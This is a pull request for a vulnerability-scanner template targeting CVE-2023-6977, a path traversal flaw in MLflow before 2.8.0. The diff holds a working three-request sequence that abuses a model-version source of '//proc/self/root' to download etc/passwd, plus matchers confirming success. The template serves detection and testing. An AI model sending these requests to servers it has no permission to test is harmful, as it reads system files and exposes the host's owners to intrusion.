### PR TITLE
Create CVE-2023-6977.yaml

### DIFF
--- a/http/cves/2023/CVE-2023-6977.yaml
+++ b/http/cves/2023/CVE-2023-6977.yaml
@@ -22,12 +22,12 @@ info:
     epss-percentile: 0.349130000
     cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
   metadata:
-    verified: true
     max-request: 3
+    verified: true
     vendor: lfprojects
     product: mlflow
     shodan-query: http.title:"mlflow"
-  tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive,lfprojects
+  tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects
 
 http:
   - raw:
@@ -37,12 +37,14 @@ http:
         Content-Type: application/json; charset=utf-8
 
         {"name":"{{randstr}}"}
+
       - |
         POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json; charset=utf-8
 
         {"name":"{{randstr}}","source":"//proc/self/root"}
+
       - |
         GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1
         Host: {{Hostname}}
@@ -52,6 +54,13 @@ http:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+      - type: word
+        part: header_3
+        words:
+          - "filename=passwd"
+          - "application/octet-stream"
+        condition: and
 
       - type: status
         status:


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2023-6977

```
Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
```

- References: https://huntr.com/bounties/fe53bf71-3687-4711-90df-c26172880aaf

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO